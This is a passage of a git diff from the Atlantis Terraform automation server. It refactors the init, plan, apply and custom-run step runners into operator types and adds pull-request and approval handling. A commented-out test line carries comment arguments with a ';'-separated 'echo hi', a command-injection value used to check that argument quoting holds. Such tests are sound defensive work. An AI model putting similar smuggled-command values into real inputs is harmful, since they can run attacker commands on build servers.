+	// Use default stage unless another workflow is defined in config
+	stage := p.defaultApplyStage()
+	if ctx.ProjectConfig != nil && ctx.ProjectConfig.Workflow != nil {
+		configuredStage := ctx.GlobalConfig.GetApplyStage(*ctx.ProjectConfig.Workflow)
+		if configuredStage != nil {
+			stage = *configuredStage
+		}
+	}
+	outputs, err := p.runSteps(stage.Steps, ctx, absPath)
+	p.Webhooks.Send(ctx.Log, webhooks.ApplyResult{ // nolint: errcheck
+		Workspace: ctx.Workspace,
+		User:      ctx.User,
+		Repo:      ctx.BaseRepo,
+		Pull:      ctx.Pull,
+		Success:   err == nil,
+	})
+	if err != nil {
+		// todo: include output from other steps.
+		return ProjectResult{Error: err}
+	}
+	return ProjectResult{
+		ApplySuccess: strings.Join(outputs, "\n"),
+	}
+}
+
+func (p ProjectOperator) defaultPlanStage() valid.Stage {
+	return valid.Stage{
+		Steps: []valid.Step{
+			{
+				StepName: "init",
+			},
+			{
+				StepName: "plan",
+			},
+		},
+	}
+}
+
+func (p ProjectOperator) defaultApplyStage() valid.Stage {
+	return valid.Stage{
+		Steps: []valid.Step{
+			{
+				StepName: "apply",
+			},
+		},
+	}
+}
diff --git a/server/events/plan_executor_test.go b/server/events/project_operator_test.go
similarity index 99%
rename from server/events/plan_executor_test.go
rename to server/events/project_operator_test.go
index 371aa9ec5c..2659c2d50c 100644
--- a/server/events/plan_executor_test.go
+++ b/server/events/project_operator_test.go
@@ -116,7 +116,7 @@ package events_test
 //	p, runner, _ := setupPlanExecutorTest(t)
 //	ctx := deepcopy.Copy(planCtx).(events.CommandContext)
 //	ctx.Log = logging.NewNoopLogger()
-//	ctx.Command.Flags = []string{"\"-target=resource\"", "\"-var\"", "\"a=b\"", "\";\"", "\"echo\"", "\"hi\""}
+//	ctx.Command.CommentArgs = []string{"\"-target=resource\"", "\"-var\"", "\"a=b\"", "\";\"", "\"echo\"", "\"hi\""}
 //
 //	When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
 //	When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace")).
diff --git a/server/events/pull_request_operator.go b/server/events/pull_request_operator.go
new file mode 100644
index 0000000000..61218e902f
--- /dev/null
+++ b/server/events/pull_request_operator.go
@@ -0,0 +1,193 @@
+package events
+
+import (
+	"os"
+	"path/filepath"
+
+	"github.com/hashicorp/go-version"
+	"github.com/runatlantis/atlantis/server/events/models"
+	"github.com/runatlantis/atlantis/server/events/vcs"
+	"github.com/runatlantis/atlantis/server/events/yaml"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+	"github.com/runatlantis/atlantis/server/logging"
+)
+
+type PullRequestOperator struct {
+	TerraformExecutor TerraformExec
+	DefaultTFVersion  *version.Version
+	ParserValidator   *yaml.ParserValidator
+	ProjectFinder     ProjectFinder
+	VCSClient         vcs.ClientProxy
+	Workspace         AtlantisWorkspace
+	ProjectOperator   ProjectOperator
+}
+
+type TerraformExec interface {
+	RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
+}
+
+func (p *PullRequestOperator) Autoplan(ctx *CommandContext) CommandResponse {
+	// check out repo to parse atlantis.yaml
+	// this will check out the repo to a * dir
+	repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace)
+	if err != nil {
+		return CommandResponse{Error: err}
+	}
+
+	// Parse config file if it exists.
+	config, err := p.ParserValidator.ReadConfig(repoDir)
+	if err != nil && !os.IsNotExist(err) {
+		return CommandResponse{Error: err}
+	}
+	noAtlantisYAML := os.IsNotExist(err)
+
+	// We'll need the list of modified files.
+	modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull)
+	if err != nil {
+		return CommandResponse{Error: err}
+	}
+
+	// Prepare the project contexts so the ProjectOperator can execute.
+	var projCtxs []models.ProjectCommandContext
+
+	// If there is no config file, then we try to plan for each project that
+	// was modified in the pull request.
+	if noAtlantisYAML {
+		modifiedProjects := p.ProjectFinder.DetermineProjects(ctx.Log, modifiedFiles, ctx.BaseRepo.FullName, repoDir)
+		for _, mp := range modifiedProjects {
+			projCtxs = append(projCtxs, models.ProjectCommandContext{
+				BaseRepo:      ctx.BaseRepo,
+				HeadRepo:      ctx.HeadRepo,
+				Pull:          ctx.Pull,
+				User:          ctx.User,
+				Log:           ctx.Log,
+				RepoRelPath:   mp.Path,
+				ProjectConfig: nil,
+				GlobalConfig:  nil,
+				CommentArgs:   nil,
+				Workspace:     DefaultWorkspace,
+			})
+		}
+	} else {
+		// Otherwise, we use the projects that match the WhenModified fields
+		// in the config file.
+		matchingProjects := p.matchingProjects(modifiedFiles, config)
+		for _, mp := range matchingProjects {
+			projCtxs = append(projCtxs, models.ProjectCommandContext{
+				BaseRepo:      ctx.BaseRepo,
+				HeadRepo:      ctx.HeadRepo,
+				Pull:          ctx.Pull,
+				User:          ctx.User,
+				Log:           ctx.Log,
+				CommentArgs:   nil,
+				Workspace:     mp.Workspace,
+				RepoRelPath:   mp.Dir,
+				ProjectConfig: &mp,
+				GlobalConfig:  &config,
+			})
+		}
+	}
+
+	// Execute the operations.
+	var results []ProjectResult
+	for _, pCtx := range projCtxs {
+		res := p.ProjectOperator.Plan(pCtx, nil)
+		res.Path = pCtx.RepoRelPath
+		res.Workspace = pCtx.Workspace
+		results = append(results, res)
+	}
+	return CommandResponse{ProjectResults: results}
+}
+
+func (p *PullRequestOperator) PlanViaComment(ctx *CommandContext) CommandResponse {
+	repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace)
+	if err != nil {
+		return CommandResponse{Error: err}
+	}
+
+	var projCfg *valid.Project
+	var globalCfg *valid.Spec
+
+	// Parse config file if it exists.
+	config, err := p.ParserValidator.ReadConfig(repoDir)
+	if err != nil && !os.IsNotExist(err) {
+		return CommandResponse{Error: err}
+	}
+	if !os.IsNotExist(err) {
+		projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace)
+		globalCfg = &config
+	}
+
+	projCtx := models.ProjectCommandContext{
+		BaseRepo:      ctx.BaseRepo,
+		HeadRepo:      ctx.HeadRepo,
+		Pull:          ctx.Pull,
+		User:          ctx.User,
+		Log:           ctx.Log,
+		CommentArgs:   ctx.Command.Flags,
+		Workspace:     ctx.Command.Workspace,
+		RepoRelPath:   ctx.Command.Dir,
+		ProjectConfig: projCfg,
+		GlobalConfig:  globalCfg,
+	}
+	projAbsPath := filepath.Join(repoDir, ctx.Command.Dir)
+	res := p.ProjectOperator.Plan(projCtx, &projAbsPath)
+	res.Workspace = projCtx.Workspace
+	res.Path = projCtx.RepoRelPath
+	return CommandResponse{
+		ProjectResults: []ProjectResult{
+			res,
+		},
+	}
+}
+
+func (p *PullRequestOperator) ApplyViaComment(ctx *CommandContext) CommandResponse {
+	repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace)
+	if err != nil {
+		return CommandResponse{Failure: "No workspace found. Did you run plan?"}
+	}
+
+	// todo: can deduplicate this between PlanViaComment
+	var projCfg *valid.Project
+	var globalCfg *valid.Spec
+
+	// Parse config file if it exists.
+	config, err := p.ParserValidator.ReadConfig(repoDir)
+	if err != nil && !os.IsNotExist(err) {
+		return CommandResponse{Error: err}
+	}
+	if !os.IsNotExist(err) {
+		projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace)
+		globalCfg = &config
+	}
+
+	projCtx := models.ProjectCommandContext{
+		BaseRepo:      ctx.BaseRepo,
+		HeadRepo:      ctx.HeadRepo,
+		Pull:          ctx.Pull,
+		User:          ctx.User,
+		Log:           ctx.Log,
+		CommentArgs:   ctx.Command.Flags,
+		Workspace:     ctx.Command.Workspace,
+		RepoRelPath:   ctx.Command.Dir,
+		ProjectConfig: projCfg,
+		GlobalConfig:  globalCfg,
+	}
+	res := p.ProjectOperator.Apply(projCtx, filepath.Join(repoDir, ctx.Command.Dir))
+	res.Workspace = projCtx.Workspace
+	res.Path = projCtx.RepoRelPath
+	return CommandResponse{
+		ProjectResults: []ProjectResult{
+			res,
+		},
+	}
+}
+
+// matchingProjects returns the list of projects whose WhenModified fields match
+// any of the modifiedFiles.
+func (p *PullRequestOperator) matchingProjects(modifiedFiles []string, config valid.Spec) []valid.Project {
+	//todo
+	// match the modified files against the config
+	// remember the modified_files paths are relative to the project paths
+	return nil
+}
diff --git a/server/events/execution_planner_test.go b/server/events/pull_request_operator_test.go
similarity index 98%
rename from server/events/execution_planner_test.go
rename to server/events/pull_request_operator_test.go
index 7b6fc7ac97..4bbdfd14b5 100644
--- a/server/events/execution_planner_test.go
+++ b/server/events/pull_request_operator_test.go
@@ -16,7 +16,7 @@ import (
 func TestBuildStage_NoConfigFile(t *testing.T) {
 	var defaultTFVersion *version.Version
 	var terraformExecutor runtime.TerraformExec
-	e := events.ExecutionPlanner{
+	e := events.PullRequestOperator{
 		DefaultTFVersion:  defaultTFVersion,
 		TerraformExecutor: terraformExecutor,
 	}
@@ -71,7 +71,7 @@ func TestBuildStage_NoConfigFile(t *testing.T) {
 func TestBuildStage(t *testing.T) {
 	var defaultTFVersion *version.Version
 	var terraformExecutor runtime.TerraformExec
-	e := events.ExecutionPlanner{
+	e := events.PullRequestOperator{
 		DefaultTFVersion:  defaultTFVersion,
 		TerraformExecutor: terraformExecutor,
 	}
diff --git a/server/events/runtime/apply_step.go b/server/events/runtime/apply_step.go
deleted file mode 100644
index 3591414815..0000000000
--- a/server/events/runtime/apply_step.go
+++ /dev/null
@@ -1,24 +0,0 @@
-package runtime
-
-import (
-	"fmt"
-	"os"
-	"path/filepath"
-)
-
-// ApplyStep runs `terraform apply`.
-type ApplyStep struct {
-	ExtraArgs []string
-	Meta      StepMeta
-}
-
-func (a *ApplyStep) Run() (string, error) {
-	planPath := filepath.Join(a.Meta.AbsolutePath, a.Meta.Workspace+".tfplan")
-	stat, err := os.Stat(planPath)
-	if err != nil || stat.IsDir() {
-		return "", fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", a.Meta.DirRelativeToRepoRoot, a.Meta.Workspace)
-	}
-
-	tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, a.ExtraArgs...), a.Meta.ExtraCommentArgs...), planPath)
-	return a.Meta.TerraformExecutor.RunCommandWithVersion(a.Meta.Log, a.Meta.AbsolutePath, tfApplyCmd, a.Meta.TerraformVersion, a.Meta.Workspace)
-}
diff --git a/server/events/runtime/apply_step_operator.go b/server/events/runtime/apply_step_operator.go
new file mode 100644
index 0000000000..819bcbf200
--- /dev/null
+++ b/server/events/runtime/apply_step_operator.go
@@ -0,0 +1,30 @@
+package runtime
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+
+	"github.com/hashicorp/go-version"
+	"github.com/runatlantis/atlantis/server/events/models"
+)
+
+// ApplyStepOperator runs `terraform apply`.
+type ApplyStepOperator struct {
+	TerraformExecutor TerraformExec
+}
+
+func (a *ApplyStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
+	planPath := filepath.Join(path, ctx.Workspace+".tfplan")
+	stat, err := os.Stat(planPath)
+	if err != nil || stat.IsDir() {
+		return "", fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", ctx.RepoRelPath, ctx.Workspace)
+	}
+
+	tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, extraArgs...), ctx.CommentArgs...), planPath)
+	var tfVersion *version.Version
+	if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil {
+		tfVersion = ctx.ProjectConfig.TerraformVersion
+	}
+	return a.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, tfApplyCmd, tfVersion, ctx.Workspace)
+}
diff --git a/server/events/runtime/apply_step_test.go b/server/events/runtime/apply_step_operator_test.go
similarity index 100%
rename from server/events/runtime/apply_step_test.go
rename to server/events/runtime/apply_step_operator_test.go
diff --git a/server/events/runtime/approval_operator.go b/server/events/runtime/approval_operator.go
new file mode 100644
index 0000000000..63731f3427
--- /dev/null
+++ b/server/events/runtime/approval_operator.go
@@ -0,0 +1,18 @@
+package runtime
+
+import (
+	"github.com/runatlantis/atlantis/server/events/models"
+	"github.com/runatlantis/atlantis/server/events/vcs"
+)
+
+type ApprovalOperator struct {
+	VCSClient vcs.ClientProxy
+}
+
+func (a *ApprovalOperator) IsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) {
+	approved, err := a.VCSClient.PullIsApproved(baseRepo, pull)
+	if err != nil {
+		return false, err
+	}
+	return approved, nil
+}
diff --git a/server/events/runtime/init_step.go b/server/events/runtime/init_step.go
deleted file mode 100644
index 1bf5b8734d..0000000000
--- a/server/events/runtime/init_step.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package runtime
-
-// InitStep runs `terraform init`.
-type InitStep struct {
-	ExtraArgs []string
-	Meta      StepMeta
-}
-
-func (i *InitStep) Run() (string, error) {
-	// If we're running < 0.9 we have to use `terraform get` instead of `init`.
-	if MustConstraint("< 0.9.0").Check(i.Meta.TerraformVersion) {
-		i.Meta.Log.Info("running terraform version %s so will use `get` instead of `init`", i.Meta.TerraformVersion)
-		terraformGetCmd := append([]string{"get", "-no-color"}, i.ExtraArgs...)
-		_, err := i.Meta.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, terraformGetCmd, i.Meta.TerraformVersion, i.Meta.Workspace)
-		return "", err
-	} else {
-		_, err := i.Meta.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, append([]string{"init", "-no-color"}, i.ExtraArgs...), i.Meta.TerraformVersion, i.Meta.Workspace)
-		return "", err
-	}
-}
diff --git a/server/events/runtime/init_step_operator.go b/server/events/runtime/init_step_operator.go
new file mode 100644
index 0000000000..307c91bcfe
--- /dev/null
+++ b/server/events/runtime/init_step_operator.go
@@ -0,0 +1,29 @@
+package runtime
+
+import (
+	"github.com/hashicorp/go-version"
+	"github.com/runatlantis/atlantis/server/events/models"
+)
+
+// InitStep runs `terraform init`.
+type InitStepOperator struct {
+	TerraformExecutor TerraformExec
+	DefaultTFVersion  *version.Version
+}
+
+func (i *InitStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
+	tfVersion := i.DefaultTFVersion
+	if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil {
+		tfVersion = ctx.ProjectConfig.TerraformVersion
+	}
+	// If we're running < 0.9 we have to use `terraform get` instead of `init`.
+	if MustConstraint("< 0.9.0").Check(tfVersion) {
+		ctx.Log.Info("running terraform version %s so will use `get` instead of `init`", tfVersion)
+		terraformGetCmd := append([]string{"get", "-no-color"}, extraArgs...)
+		_, err := i.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, terraformGetCmd, tfVersion, ctx.Workspace)
+		return "", err
+	} else {
+		_, err := i.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, append([]string{"init", "-no-color"}, extraArgs...), tfVersion, ctx.Workspace)
+		return "", err
+	}
+}
diff --git a/server/events/runtime/init_step_test.go b/server/events/runtime/init_step_operator_test.go
similarity index 75%
rename from server/events/runtime/init_step_test.go
rename to server/events/runtime/init_step_operator_test.go
index 911bcb2330..8296394977 100644
--- a/server/events/runtime/init_step_test.go
+++ b/server/events/runtime/init_step_operator_test.go
@@ -43,23 +43,17 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) {
 
 			tfVersion, _ := version.NewVersion(c.version)
 			logger := logging.NewNoopLogger()
-			s := runtime.InitStep{
-				Meta: runtime.StepMeta{
-					Log:                   logger,
-					Workspace:             "workspace",
-					AbsolutePath:          "/path",
-					DirRelativeToRepoRoot: ".",
-					TerraformVersion:      tfVersion,
-					TerraformExecutor:     terraform,
-					ExtraCommentArgs:      []string{"comment", "args"},
-					Username:              "username",
-				},
-				ExtraArgs: []string{"extra", "args"},
+			iso := runtime.InitStepOperator{
+				TerraformExecutor: terraform,
 			}
-
 			When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
 				ThenReturn("output", nil)
-			output, err := s.Run()
+			output, err := iso.Run(runtime.ProjectCommandContext{
+				Log:         logger,
+				Workspace:   "workspace",
+				AbsPath:     "/path",
+				RepoRelPath: ".",
+			}, []string{"extra", "args"})
 			Ok(t, err)
 			// Shouldn't return output since we don't print init output to PR.
 			Equals(t, "", output)
diff --git a/server/events/runtime/plan_step.go b/server/events/runtime/plan_step_operater.go
similarity index 54%
rename from server/events/runtime/plan_step.go
rename to server/events/runtime/plan_step_operater.go
index b8d6b3acee..a7fd6793d0 100644
--- a/server/events/runtime/plan_step.go
+++ b/server/events/runtime/plan_step_operater.go
@@ -5,6 +5,9 @@ import (
 	"os"
 	"path/filepath"
 	"strings"
+
+	"github.com/hashicorp/go-version"
+	"github.com/runatlantis/atlantis/server/events/models"
 )
 
 // atlantisUserTFVar is the name of the variable we execute terraform
@@ -12,45 +15,48 @@ import (
 const atlantisUserTFVar = "atlantis_user"
 const defaultWorkspace = "default"
 
-// PlanStep runs `terraform plan`.
-type PlanStep struct {
-	ExtraArgs []string
-	Meta      StepMeta
+type PlanStepOperator struct {
+	TerraformExecutor TerraformExec
+	DefaultTFVersion  *version.Version
 }
 
-func (p *PlanStep) Run() (string, error) {
+func (p *PlanStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
+	tfVersion := p.DefaultTFVersion
+	if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil {
+		tfVersion = ctx.ProjectConfig.TerraformVersion
+	}
+
 	// We only need to switch workspaces in version 0.9.*. In older versions,
 	// there is no such thing as a workspace so we don't need to do anything.
-	// In newer versions, the TF_WORKSPACE env var is respected and will handle
-	// using the right workspace and even creating it if it doesn't exist.
-	// This variable is set inside the Terraform executor.
-	if err := p.switchWorkspace(); err != nil {
+	if err := p.switchWorkspace(ctx, path, tfVersion); err != nil {
 		return "", err
 	}
 
-	planFile := filepath.Join(p.Meta.AbsolutePath, fmt.Sprintf("%s.tfplan", p.Meta.Workspace))
-	userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, p.Meta.Username)
-	tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, p.ExtraArgs...), p.Meta.ExtraCommentArgs...)
+	planFile := filepath.Join(path, fmt.Sprintf("%s.tfplan", ctx.Workspace))
+	userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, ctx.User.Username)
+	tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, extraArgs...), ctx.CommentArgs...)
 
 	// Check if env/{workspace}.tfvars exist and include it. This is a use-case
 	// from Hootsuite where Atlantis was first created so we're keeping this as
 	// an homage and a favor so they don't need to refactor all their repos.
 	// It's also a nice way to structure your repos to reduce duplication.
-	optionalEnvFile := filepath.Join(p.Meta.AbsolutePath, "env", p.Meta.Workspace+".tfvars")
+	optionalEnvFile := filepath.Join(path, "env", ctx.Workspace+".tfvars")
 	if _, err := os.Stat(optionalEnvFile); err == nil {
 		tfPlanCmd = append(tfPlanCmd, "-var-file", optionalEnvFile)
 	}
 
-	return p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, filepath.Join(p.Meta.AbsolutePath), tfPlanCmd, p.Meta.TerraformVersion, p.Meta.Workspace)
+	return p.TerraformExecutor.RunCommandWithVersion(ctx.Log, filepath.Join(path), tfPlanCmd, tfVersion, ctx.Workspace)
 }
 
 // switchWorkspace changes the terraform workspace if necessary and will create
 // it if it doesn't exist. It handles differences between versions.
-func (p *PlanStep) switchWorkspace() error {
+func (p *PlanStepOperator) switchWorkspace(ctx models.ProjectCommandContext, path string, tfVersion *version.Version) error {
 	// In versions less than 0.9 there is no support for workspaces.
-	noWorkspaceSupport := MustConstraint("<0.9").Check(p.Meta.TerraformVersion)
-	if noWorkspaceSupport && p.Meta.Workspace != defaultWorkspace {
-		return fmt.Errorf("terraform version %s does not support workspaces", p.Meta.TerraformVersion)
+	noWorkspaceSupport := MustConstraint("<0.9").Check(tfVersion)
+	// If the user tried to set a specific workspace in the comment but their
+	// version of TF doesn't support workspaces then error out.
+	if noWorkspaceSupport && ctx.Workspace != defaultWorkspace {
+		return fmt.Errorf("terraform version %s does not support workspaces", tfVersion)
 	}
 	if noWorkspaceSupport {
 		return nil
@@ -58,7 +64,7 @@ func (p *PlanStep) switchWorkspace() error {
 
 	// In version 0.9.* the workspace command was called env.
 	workspaceCmd := "workspace"
-	runningZeroPointNine := MustConstraint(">=0.9,<0.10").Check(p.Meta.TerraformVersion)
+	runningZeroPointNine := MustConstraint(">=0.9,<0.10").Check(tfVersion)
 	if runningZeroPointNine {
 		workspaceCmd = "env"
 	}
@@ -67,12 +73,12 @@ func (p *PlanStep) switchWorkspace() error {
 	// already in the right workspace then no need to switch. This will save us
 	// about ten seconds. This command is only available in > 0.10.
 	if !runningZeroPointNine {
-		workspaceShowOutput, err := p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "show"}, p.Meta.TerraformVersion, p.Meta.Workspace)
+		workspaceShowOutput, err := p.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, []string{workspaceCmd, "show"}, tfVersion, ctx.Workspace)
 		if err != nil {
 			return err
 		}
 		// If `show` says we're already on this workspace then we're done.
-		if strings.TrimSpace(workspaceShowOutput) == p.Meta.Workspace {
+		if strings.TrimSpace(workspaceShowOutput) == ctx.Workspace {
 			return nil
 		}
 	}
@@ -82,11 +88,11 @@ func (p *PlanStep) switchWorkspace() error {
 	// we can create it if it doesn't. To do this we can either select and catch
 	// the error or use list and then look for the workspace. Both commands take
 	// the same amount of time so that's why we're running select here.
-	_, err := p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "select", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace)
+	_, err := p.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, []string{workspaceCmd, "select", "-no-color", ctx.Workspace}, tfVersion, ctx.Workspace)
 	if err != nil {
 		// If terraform workspace select fails we run terraform workspace
 		// new to create a new workspace automatically.
-		_, err = p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "new", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace)
+		_, err = p.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, []string{workspaceCmd, "new", "-no-color", ctx.Workspace}, tfVersion, ctx.Workspace)
 		return err
 	}
 	return nil
diff --git a/server/events/runtime/plan_step_test.go b/server/events/runtime/plan_step_operater_test.go
similarity index 100%
rename from server/events/runtime/plan_step_test.go
rename to server/events/runtime/plan_step_operater_test.go
diff --git a/server/events/runtime/repoconfig.go b/server/events/runtime/repoconfig.go
deleted file mode 100644
index 0880920fb5..0000000000
--- a/server/events/runtime/repoconfig.go
+++ /dev/null
@@ -1,93 +0,0 @@
-package runtime
-
-import (
-	"github.com/hashicorp/go-version"
-	"github.com/runatlantis/atlantis/server/logging"
-)
-
-type TerraformExec interface {
-	RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
-}
-
-type ApplyRequirement interface {
-	// IsMet returns true if the requirement is met and false if not.
-	// If it returns false, it also returns a string describing why not.
-	IsMet() (bool, string)
-}
-
-type PlanStage struct {
-	Steps       []Step
-	Workspace   string
-	ProjectPath string
-}
-
-type ApplyStage struct {
-	Steps             []Step
-	ApplyRequirements []ApplyRequirement
-}
-
-func (p PlanStage) Run() (string, error) {
-	var outputs string
-	for _, step := range p.Steps {
-		out, err := step.Run()
-		if err != nil {
-			return outputs, err
-		}
-		if out != "" {
-			// Outputs are separated by newlines.
-			outputs += "\n" + out
-		}
-	}
-	return outputs, nil
-}
-
-func (a ApplyStage) Run() (string, error) {
-	var outputs string
-	for _, step := range a.Steps {
-		out, err := step.Run()
-		if err != nil {
-			return outputs, err
-		}
-		if out != "" {
-			// Outputs are separated by newlines.
-			outputs += "\n" + out
-		}
-	}
-	return outputs, nil
-}
-
-type Step interface {
-	// Run runs the step. It returns any output that needs to be commented back
-	// onto the pull request and error.
-	Run() (string, error)
-}
-
-// StepMeta is the data that is available to all steps.
-type StepMeta struct {
-	Log       *logging.SimpleLogger
-	Workspace string
-	// AbsolutePath is the path to this project on disk. It's not necessarily
-	// the repository root since a project can be in a subdir of the root.
-	AbsolutePath string
-	// DirRelativeToRepoRoot is the directory for this project relative
-	// to the repo root.
-	DirRelativeToRepoRoot string
-	TerraformVersion      *version.Version
-	TerraformExecutor     TerraformExec
-	// ExtraCommentArgs are the arguments that may have been appended to the comment.
-	// For example 'atlantis plan -- -target=resource'. They are already quoted
-	// further up the call tree to mitigate security issues.
-	ExtraCommentArgs []string
-	// VCS username of who caused this step to be executed. For example the
-	// commenter, or who pushed a new commit.
-	Username string
-}
-
-// MustConstraint returns a constraint. It panics on error.
-func MustConstraint(constraint string) version.Constraints {
-	c, err := version.NewConstraint(constraint)
-	if err != nil {
-		panic(err)
-	}
-	return c
-}
diff --git a/server/events/runtime/run_step.go b/server/events/runtime/run_step.go
deleted file mode 100644
index ba6dbe3859..0000000000
--- a/server/events/runtime/run_step.go
+++ /dev/null
@@ -1,35 +0,0 @@
-package runtime
-
-import (
-	"fmt"
-	"os/exec"
-	"strings"
-
-	"github.com/pkg/errors"
-)
-
-// RunStep runs custom commands.
-type RunStep struct {
-	Commands []string
-	Meta     StepMeta
-}
-
-func (r *RunStep) Run() (string, error) {
-	if len(r.Commands) < 1 {
-		return "", errors.New("no commands for run step")
-	}
-	path := r.Meta.AbsolutePath
-
-	cmd := exec.Command("sh", "-c", strings.Join(r.Commands, " ")) // #nosec
-	cmd.Dir = path
-	out, err := cmd.CombinedOutput()
-
-	commandStr := strings.Join(r.Commands, " ")
-	if err != nil {
-		err = fmt.Errorf("%s: running %q in %q: \n%s", err, commandStr, path, out)
-		r.Meta.Log.Debug("error: %s", err)
-		return string(out), err
-	}
-	r.Meta.Log.Info("successfully ran %q in %q", commandStr, path)
-	return string(out), nil
-}
diff --git a/server/events/runtime/run_step_operator.go b/server/events/runtime/run_step_operator.go
new file mode 100644
index 0000000000..6554527be6
--- /dev/null
+++ b/server/events/runtime/run_step_operator.go
@@ -0,0 +1,33 @@
+package runtime
+
+import (
+	"fmt"
+	"os/exec"
+	"strings"
+
+	"github.com/pkg/errors"
+	"github.com/runatlantis/atlantis/server/events/models"
+)
+
+// RunStepOperator runs custom commands.
+type RunStepOperator struct {
+}
+
+func (r *RunStepOperator) Run(ctx models.ProjectCommandContext, command []string, path string) (string, error) {
+	if len(command) < 1 {
+		return "", errors.New("no commands for run step")
+	}
+
+	cmd := exec.Command("sh", "-c", strings.Join(command, " ")) // #nosec
+	cmd.Dir = path
+	out, err := cmd.CombinedOutput()
+
+	commandStr := strings.Join(command, " ")
+	if err != nil {
+		err = fmt.Errorf("%s: running %q in %q: \n%s", err, commandStr, path, out)
+		ctx.Log.Debug("error: %s", err)
+		return string(out), err
+	}
+	ctx.Log.Info("successfully ran %q in %q", commandStr, path)
+	return string(out), nil
+}
diff --git a/server/events/runtime/run_step_test.go b/server/events/runtime/run_step_operator_test.go
similarity index 100%
rename from server/events/runtime/run_step_test.go
rename to server/events/runtime/run_step_operator_test.go
diff --git a/server/events/runtime/runtime.go b/server/events/runtime/runtime.go
index ea70550a68..8e599ff659 100644
--- a/server/events/runtime/runtime.go
+++ b/server/events/runtime/runtime.go
@@ -2,3 +2,21 @@
 // based on configuration and defaults. The handlers can then execute this
 // graph.
 package runtime
+
+import (
+	"github.com/hashicorp/go-version"
+	"github.com/runatlantis/atlantis/server/logging"
+)
+
+type TerraformExec interface {
+	RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
+}
+
+// MustConstraint returns a constraint. It panics on error.
+func MustConstraint(constraint string) version.Constraints {
+	c, err := version.NewConstraint(constraint)
+	if err != nil {
+		panic(err)
+	}
+	return c
+}
diff --git a/server/events/terraform/terraform_client.go b/server/events/terraform/terraform_client.go
index a3508be724..55ed5d687e 100644
--- a/server/events/terraform/terraform_client.go
+++ b/server/events/terraform/terraform_client.go
@@ -87,14 +87,17 @@ func (c *DefaultClient) Version() *version.Version {
 }
 
 // RunCommandWithVersion executes the provided version of terraform with
-// the provided args in path. v is the version of terraform executable to use
-// and workspace is the workspace specified by the user commenting
-// "atlantis plan/apply {workspace}" which is set to "default" by default.
+// the provided args in path. v is the version of terraform executable to use.
+// If v is nil, will use the default version.
+// Workspace is the terraform workspace to run in. We won't switch workspaces
+// but will set the TERRAFORM_WORKSPACE environment variable.
 func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) {
 	tfExecutable := "terraform"
+	tfVersionStr := c.defaultVersion.String()
 	// if version is the same as the default, don't need to prepend the version name to the executable
-	if !v.Equal(c.defaultVersion) {
+	if v != nil && !v.Equal(c.defaultVersion) {
 		tfExecutable = fmt.Sprintf("%s%s", tfExecutable, v.String())
+		tfVersionStr = v.String()
 	}
 
 	// set environment variables
@@ -115,7 +118,7 @@ func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path st
 		// because it's probably safer for users to rely on it. Terraform might
 		// change the way TF_WORKSPACE works in the future.
